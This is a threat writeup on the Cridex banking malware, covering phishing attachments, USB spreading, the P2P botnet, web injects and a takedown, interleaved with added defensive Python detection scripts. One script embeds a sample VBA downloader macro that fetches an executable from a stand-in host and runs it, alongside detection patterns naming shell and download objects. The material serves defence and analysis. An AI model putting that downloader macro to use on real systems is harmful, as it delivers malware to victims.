  3. W32.Cridex


Risk Level 1: Very Low

Discovered: January 20, 2012
Updated: November 12, 2015 1:57:18 PM
Infection Length:
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Ensure security software is up-to-date and active
1.3 Use email filtering
2. Infection methods
2.1 Email attachments
2.1.1 Malicious Microsoft Office macros
2.2 Self-replication
3. Functionality
3.1 Installation
3.2 Botnet addition
3.3 Back door
3.4 Information theft
3.5 Download components
4. Additional information
4.1 Law enforcement takedown
4.2 Resources

1. Prevention and avoidance
The following actions can be taken to avoid or minimize the risk from this threat.

1.1 User behavior and precautions
Be aware of attackers' social-engineering techniques and avoid opening attachments or links in emails from unknown senders. Attackers try to entice users into opening attachments or links in many different ways, such as claiming that the attachment is a bill, a fax notification, a special offer, or a delivery notice.

Do not enable Microsoft Office macros. Attackers often embed macros containing malicious code in their documents, attach these files to spam or spear-phishing emails, and try to trick users into opening them and enabling the macros. If the user enables macros, the malicious code downloads additional threats from a remote location onto the computer. Microsoft disables macros by default because of this security risk. The company gives users the option to enable them, but doing so is not recommended.

Cridex is capable of spreading through removable drives, so users should take care when connecting such a device to their computer. It is good security practice to disable the AutoRun feature so that removable devices do not execute content when they are inserted. Note that AutoRun is disabled by default for non-optical removable drives in recent versions of Windows and on computers with certain updates applied. Removable drives should be disconnected when not required. If write access is not required, users should enable read-only mode if the drive offers the option.

1.2 Ensure security software is up-to-date and active

Symantec and Norton products detect W32.Cridex and its variants. Symantec reputation-based detection technologies are also able to proactively protect against many of the files used in these attacks. Keep your security software up to date to protect yourself from the latest variants of this threat.

1.3 Use email filtering
Email-filtering services such as Symantec Messaging Gateway and Symantec Email Security.cloud can help to filter out potential targeted attack emails before they reach the intended users.


2. Infection methods
The threat may use the following infection methods to compromise the affected computer.

2.1 Email attachments
W32.Cridex is typically spread through spam or phishing emails with malicious attachments. The emails use social-engineering techniques to convince the user to open the attachment. For example, some Cridex emails claim that the attachment is an invoice for water services or web hosting, which requires the user’s attention. Others claim that the user has received a fax containing a hotel itinerary.

The following subjects were observed in Cridex emails that were delivered to English and French speakers in October and November 2015 (English glosses of the French subjects are given in parentheses):
  • Comptabilité de PACAR : facture n° AAAAAAAA du 26/10 (PACAR accounting: invoice no. AAAAAAAA of 26/10)
  • Your Norwich Camping Order has shipped!
  • Facture (Invoice)
  • devis nettoyage (cleaning quote)
  • Scan Data from FX-D6DBE1
  • Your MF Communications bill for
  • Please prepare below requirements for your Pouch
  • Votre FACTURE (Your INVOICE)
  • Facture / actual Rennes (Invoice / actual Rennes)
  • [Scan] 2015-10-14 5:29:54 p.m.
  • "Invoice-302673.doc"
  • Insurance
  • Water Services Invoice
  • Your latest DHL invoice
  • Copy of Invoice(s)
  • order-so00653333-1.doc

The most recent Cridex email attachments are Word and Excel documents with malicious macros embedded in them. These macros are used to drop the payload onto the affected computer.

2.1.1 Malicious Microsoft Office macros
A macro is made up of a series of commands and instructions grouped in a single function, letting the user perform an action much faster than if it was manually conducted. Microsoft created macros for its Office software suite to allow users to automate frequently used tasks. They are written in a programming language called Visual Basic for Applications (VBA).

While macros were designed for legitimate purposes, attackers have created some that can perform malicious actions. The attackers embed the macros in Microsoft Office documents and spread them in spam or targeted emails.

Microsoft is aware of this issue and has since disabled macros from loading in Office documents by default. In their attempts to circumvent this protection, attackers use social-engineering techniques to convince users to enable macros to run.

For Cridex campaigns, the attackers code the malicious macros to drop the malware onto computers. If the user chooses to enable macros, then the threat is installed.

Symantec detects the Word documents containing the malicious macros seen in Cridex campaigns as W97M.Downloader.
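The downloader pattern described in sections 1.1 and 2.1.1 (an auto-executing macro that fetches a payload, writes it to disk, and runs it) can be triaged quickly once the VBA source has been extracted from the document. The script below is an added example and is not Symantec's detection logic or code from any Cridex sample; the macro text it scans is constructed for illustration, and the keyword lists are an analyst's heuristic, not a signature. Extracting the VBA stream from a real .doc or .xls is a separate step (a tool such as olevba does this); this example starts from the extracted text.

```python
"""Heuristic triage of extracted VBA macro source for downloader behaviour.

Added example, not from the original writeup. Operates on macro text that
has already been pulled out of the Office document.
"""
import re

# Entry points that run without the user clicking anything once macros are on.
AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open", "AutoExec")

# Capabilities an invoice or fax document has no business using.
SUSPICIOUS = {
    "shell_exec": r"\b(Shell|WScript\.Shell|CreateObject\s*\(\s*\"WScript\.Shell)",
    "download": r"\b(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)",
    "drop_to_disk": r"\b(Open\s+.+\s+For\s+Binary|SaveToFile|Environ\s*\(\s*\"(TEMP|APPDATA)\")",
    "obfuscation": r"\b(Chr\s*\(|StrReverse\s*\(|Xor\b)",
}

# Constructed sample in the style of a macro downloader; example.invalid never resolves.
SAMPLE_MACRO = '''Sub AutoOpen()
    Dim p As String
    p = Environ("TEMP") & "\\inv" & Chr(46) & "exe"
    Dim h: Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/doc/invoice.php", False
    h.Send
    Dim s: Set s = CreateObject("ADODB.Stream")
    s.Open: s.Type = 1: s.Write h.responseBody: s.SaveToFile p, 2
    CreateObject("WScript.Shell").Run p
End Sub'''


def triage_vba(src):
    """Return which auto-exec entry points and suspicious capability classes appear."""
    hits = {}
    for name, pattern in SUSPICIOUS.items():
        found = re.findall(pattern, src, re.IGNORECASE)
        if found:
            hits[name] = len(found)
    autoexec = [a for a in AUTOEXEC
                if re.search(r"\bSub\s+" + a + r"\b", src, re.IGNORECASE)]
    return {"autoexec": autoexec, "hits": hits}


def verdict(result):
    """Auto-run plus download plus execute is the downloader pattern; flag it."""
    h = result["hits"]
    if result["autoexec"] and "download" in h and "shell_exec" in h:
        return "downloader"
    if result["autoexec"] and h:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    r = triage_vba(SAMPLE_MACRO)
    print(r, verdict(r))
```

The verdict deliberately requires the combination of an auto-exec entry point, a download capability and a process launch; any one of them alone appears in legitimate macros, which is why a keyword hit by itself is only "suspicious".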

2.2 Self-replication
Cridex is capable of spreading onto removable devices connected to the computer. It propagates by copying itself to mapped network drives and attached local storage such as USB keys. If an infected drive is then attached to another computer that is configured to run the drive's contents automatically when it is inserted, the malware installs itself on that computer.
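The defence suggested in section 1.1 for this propagation route is disabling AutoRun. On Windows that is governed by the NoDriveTypeAutoRun bitmask under the Policies\Explorer key, and administrators often misread which drive types a given value actually covers. The script below is an added example, not part of the writeup: it decodes a value into the drive types it disables, reports whether removable and network drives (the two types Cridex abuses) are covered, and on Windows reads the live policy value; the 0x91 value used in the usage call is just a sample input.

```python
"""Decode the Windows NoDriveTypeAutoRun policy bitmask.

Added example, not from the original writeup. The value lives under
HKLM (or HKCU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer.
Each set bit disables AutoRun for one drive type; 0xFF disables it everywhere.
"""
import sys

DRIVE_TYPE_BITS = {
    0x01: "DRIVE_UNKNOWN",
    0x02: "DRIVE_NO_ROOT_DIR",
    0x04: "DRIVE_REMOVABLE",    # USB keys, floppies
    0x08: "DRIVE_FIXED",
    0x10: "DRIVE_REMOTE",       # mapped network drives
    0x20: "DRIVE_CDROM",
    0x40: "DRIVE_RAMDISK",
    0x80: "DRIVE_UNKNOWN_HIGH",  # unknown drive types, second bit
}

# Drive types that matter for a worm that copies itself to USB keys and shares.
MUST_BE_DISABLED = {0x04: "DRIVE_REMOVABLE", 0x10: "DRIVE_REMOTE", 0x20: "DRIVE_CDROM"}


def autorun_report(value):
    """Return (disabled_types, gaps): what the value disables and what it leaves open."""
    disabled = [name for bit, name in sorted(DRIVE_TYPE_BITS.items()) if value & bit]
    gaps = [name for bit, name in sorted(MUST_BE_DISABLED.items()) if not value & bit]
    return disabled, gaps


def is_hardened(value):
    """True only when every drive type is covered (the 0xFF recommendation)."""
    return (value & 0xFF) == 0xFF


def read_policy_value(hive="HKLM"):
    """Read the live value on Windows; returns None elsewhere or if unset."""
    if sys.platform != "win32":
        return None
    import winreg
    root = winreg.HKEY_LOCAL_MACHINE if hive == "HKLM" else winreg.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    try:
        with winreg.OpenKey(root, path) as key:
            value, _ = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
            return int(value)
    except OSError:
        return None


if __name__ == "__main__":
    live = read_policy_value()
    value = live if live is not None else 0x91  # 0x91: sample value for illustration
    disabled, gaps = autorun_report(value)
    print(f"NoDriveTypeAutoRun=0x{value:02X} disables {disabled}; still open: {gaps}; "
          f"hardened={is_hardened(value)}")
```

A value that leaves DRIVE_REMOVABLE or DRIVE_REMOTE in the gaps list is the condition under which the propagation described above succeeds; setting the value to 0xFF closes both.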

3. Functionality
Once the threat has compromised the computer, it may perform the following actions.

3.1 Installation
When Cridex is executed, it creates a loader module on the computer. The loader reads its configuration details to allow it to find out the remote location of the threat’s worker module, which contains all of Cridex’s main functionality.

3.2 Botnet addition
The attackers use multiple, segregated peer-to-peer (P2P) botnets for Cridex’s infrastructure. By using P2P botnets, the attackers don’t need to route their commands through a centralized location. The P2P nature of the botnets means that commands are propagated through multiple connections, making the infrastructure resilient to takedowns. The fact that the attackers use more than one botnet makes the threat even more difficult to tackle.

Once the worker module is downloaded and installed, the loader adds the compromised computer to one of Cridex’s botnets. The loader then retrieves a list of other bots, commands, and updated modules. The Cridex malware has been observed using HTTPS on unconventional ports to connect to other bots.

A Cridex botnet includes C&C servers which are either compromised third-party computers or are owned by the attackers. The network also contains compromised computers; some are classed as “super peers” and others act as “peers.” The super peers receive the most up-to-date commands and configuration details from the attacker, and spread them to the normal peers.

Once executed, the worker module takes charge of carrying out the malware's main commands. It connects to other peers and servers over HTTPS or raw TCP. The data that the module sends and receives is encrypted and compressed, so the traffic cannot be inspected or matched on content, only on its shape (ports, protocols, and peers).
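Because the P2P traffic is encrypted, the practical handle network defenders have on it is the behaviour the writeup describes: HTTPS on unconventional ports and unidentified bidirectional TCP sessions to external hosts. The script below is an added example, not Symantec's or Cridex's code: it applies those two heuristics to Zeek-style connection records. The log lines are constructed for illustration (the destination addresses are from the documentation ranges and do not belong to any real infrastructure), the field subset is an assumption (a real conn.log carries more columns), and the "expected TLS ports" set is a starting point to tune per environment.

```python
"""Flag TLS on non-standard ports and unidentified TCP sessions in conn records.

Added example, not from the original writeup. Input is a reduced Zeek-style
conn.log: tab-separated, one connection per line.
"""
import ipaddress

EXPECTED_TLS_PORTS = {443, 8443, 465, 993, 995}
FIELDS = ["ts", "orig_h", "resp_h", "resp_p", "proto", "service", "orig_bytes", "resp_bytes"]

# RFC 1918 plus loopback; documentation ranges deliberately count as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample records, not a real capture.
SAMPLE_CONN_LOG = """\
1445328000.10\t10.1.2.15\t198.51.100.20\t443\ttcp\tssl\t1200\t5400
1445328001.22\t10.1.2.15\t203.0.113.77\t4431\ttcp\tssl\t980\t2100
1445328002.50\t10.1.2.15\t198.51.100.9\t8443\ttcp\tssl\t300\t700
1445328003.91\t10.1.2.15\t203.0.113.12\t9090\ttcp\t-\t640\t880
1445328004.05\t10.1.2.15\t10.1.2.1\t4431\ttcp\tssl\t500\t500
1445328005.33\t10.1.2.15\t192.0.2.44\t53\tudp\tdns\t60\t120
"""


def parse_conn_log(text):
    """Parse the reduced conn.log format into dicts with numeric ports and byte counts."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, line.split("\t")))
        for key in ("resp_p", "orig_bytes", "resp_bytes"):
            rec[key] = int(rec[key])
        records.append(rec)
    return records


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_connections(records):
    """Return (reason, record) pairs: TLS on odd ports, or unlabelled two-way TCP to high ports."""
    out = []
    for r in records:
        if r["proto"] != "tcp" or is_internal(r["resp_h"]):
            continue
        if r["service"] == "ssl" and r["resp_p"] not in EXPECTED_TLS_PORTS:
            out.append(("tls_on_unusual_port", r))
        elif (r["service"] == "-" and r["resp_p"] >= 1024
              and r["orig_bytes"] > 0 and r["resp_bytes"] > 0):
            out.append(("unidentified_bidirectional_tcp", r))
    return out


if __name__ == "__main__":
    for reason, rec in suspicious_connections(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{reason}: {rec['orig_h']} -> {rec['resp_h']}:{rec['resp_p']}")
```

Both heuristics produce noise on their own (developer tooling and VPN clients also use TLS on odd ports); they are most useful aggregated per source host over a day, where one workstation talking TLS to many distinct external peers on many high ports is the P2P profile the writeup describes.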

3.3 Back door
Cridex opens a back door on compromised computers to give the attackers remote access to the entire computer. It does this by setting up a Virtual Network Computing (VNC) server, mini web server, or a Socket Secure (SOCKS) server.

The threat has been observed connecting to domain names generated with an algorithm and predetermined IP addresses. When the attackers have this back door access, they can monitor network traffic. They can also upload, download, and execute files.
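The writeup says the back door reaches C&C over algorithmically generated domain names but does not describe the algorithm, so no Cridex-specific signature can be derived from it. What a defender can do with DNS telemetry is score query names for the randomness that most generation algorithms produce. The script below is an added, generic example and not Cridex's DGA or Symantec's detection; the query log is constructed, the thresholds are illustrative, and the registrable-label extraction is deliberately crude (production code would use the Public Suffix List).

```python
"""Score DNS query names for DGA-like randomness.

Added example, not from the original writeup and not specific to any
particular domain generation algorithm.
"""
import math
from collections import Counter

# Constructed queries: three benign names and three random-looking ones.
SAMPLE_DNS_QUERIES = [
    "www.example.com",
    "update.microsoft.com",
    "xk3qpwz7vbn2.net",
    "qzjvrkwtxplmbd.com",
    "mail.google.com",
    "a9f4c2e1b7d3.org",
]


def registrable_label(fqdn):
    """Label left of the TLD; ignores multi-part suffixes such as co.uk (assumption)."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s):
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dga_score(label):
    """Count how many randomness indicators the label trips (0 to 4)."""
    n = max(len(label), 1)
    vowel_ratio = sum(ch in "aeiou" for ch in label) / n
    digit_ratio = sum(ch.isdigit() for ch in label) / n
    score = 0
    if shannon_entropy(label) > 3.2:   # many distinct characters for the length
        score += 1
    if vowel_ratio < 0.2:              # pronounceable words have more vowels
        score += 1
    if digit_ratio > 0.3:              # digits inside the label are rare in real brands
        score += 1
    if len(label) >= 10:
        score += 1
    return score


def flag_dga_candidates(queries, threshold=2):
    """Return the query names scoring at or above the threshold."""
    return [q for q in queries if dga_score(registrable_label(q)) >= threshold]


if __name__ == "__main__":
    for q in SAMPLE_DNS_QUERIES:
        print(f"{q:24s} score={dga_score(registrable_label(q))}")
    print("candidates:", flag_dga_candidates(SAMPLE_DNS_QUERIES))
```

Entropy alone misfires on CDN and cloud hostnames, which is why the score combines it with vowel and digit ratios; in practice the useful signal is one host resolving many high-scoring names, most of them NXDOMAIN, within a short window.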

3.4 Information theft
Cridex includes several information-stealing features, letting the attackers obtain a huge amount of the victim’s sensitive information and take over their online accounts. The threat can capture screenshots and log keystrokes. It also injects itself into web browsers to display its own content, and gather saved passwords, cookies, or data entered into forms.

The malware waits until the user visits online banking sites that are listed in its configuration file. Once this happens, the malware injects its own web content into the website’s HTML code in order to mimic the appearance of the site’s login and transaction pages.

If the user inputs their details into these fraudulent web pages, then their data is saved into a file and is sent to the attacker’s remote location. This gives the attackers the means to access the victim’s bank account. They could directly steal the victim’s money or sell this data to other cybercriminals.
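The injection described above leaves a visible trace in the page the victim sees: fields the bank never asks for (a full card number, a PIN, a one-time code requested out of sequence) appear inside an otherwise genuine form. The script below is an added example, not Cridex's inject code or any bank's real check: it parses the form fields of a baseline page and of an observed page and reports the fields that were added. Both HTML documents are constructed for illustration; a real deployment would compare the DOM the browser actually rendered (which is where the injection happens) against a baseline captured from a clean session, not the HTML as served.

```python
"""Diff form fields between a baseline login page and an observed one.

Added example, not from the original writeup. Flags fields present in the
observed page that the baseline never had, the fingerprint of a web inject.
"""
from html.parser import HTMLParser

# Constructed pages; the observed one has two injected fields.
BASELINE_HTML = """
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf" value="abc">
  <input type="submit" value="Sign in">
</form>
"""

OBSERVED_HTML = """
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <div class="verify">
    <input type="text" name="card_number" placeholder="Card number">
    <input type="password" name="pin" placeholder="ATM PIN">
  </div>
  <input type="hidden" name="csrf" value="abc">
  <input type="submit" value="Sign in">
</form>
"""


class FormFieldCollector(HTMLParser):
    """Collect the names of user-facing form controls in document order."""

    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("input", "select", "textarea"):
            return
        a = dict(attrs)
        name = a.get("name")
        # Buttons carry no user data; hidden fields are kept because injects use them too.
        if name and a.get("type") not in ("submit", "button", "reset", "image"):
            self.fields.append(name)


def form_fields(html):
    p = FormFieldCollector()
    p.feed(html)
    return p.fields


def injected_fields(baseline_html, observed_html):
    """Fields in the observed page that the baseline does not have, in page order."""
    expected = set(form_fields(baseline_html))
    return [f for f in form_fields(observed_html) if f not in expected]


if __name__ == "__main__":
    extra = injected_fields(BASELINE_HTML, OBSERVED_HTML)
    print("injected fields:", extra if extra else "none")
```

The check is cheap enough to run from a script or from the bank's own page (sending the list of rendered field names back with the login request), and any unexpected field named for a card number, PIN, or one-time code is strong evidence of the fraudulent pages described above.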

3.5 Download components

Cridex is capable of downloading additional modules to update its functionality or C&C infrastructure.

4. Additional information
The following details activities surrounding Cridex, along with resources to learn more about the threat.

4.1 Law enforcement takedown
On October 13, 2015, international law enforcement agencies announced that they sinkholed thousands of Cridex-compromised computers, releasing them from the botnet that they were on. The sinkholing operation involved the entities redirecting the bots’ traffic away from Cridex C&C servers to benign substitute servers. The police also arrested one man in connection with the malware’s activities.

While the crackdown had an impact on Cridex’s infrastructure, it hasn’t entirely ended the threat’s campaigns. Symantec has observed a continuation of W32.Cridex activity following the takedown.

Symantec has seen and blocked multiple email-based malware runs numbering in the tens of thousands just days after the takedown. The emails used in these attacks are being blocked by our email protection technologies in Symantec Email Security.cloud and Symantec Messaging Gateway.

We also observed Cridex infections occurring after the October 13 takedown announcement. Cridex infections increased between October 12 and October 15, before dropping again. Then from October 20, infections shot up and continued at these heights up to the end of the month. The following chart shows Cridex infection activity before and after the takedown.

While law enforcement crackdowns against malware infrastructure can play a significant role in disrupting cybercriminals’ activities, users should not assume that the threat is gone after these actions.

4.2 Resources
For more information relating to this threat family, please see the following resources:



Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack; removing them leaves threats fewer avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Laura O'Brien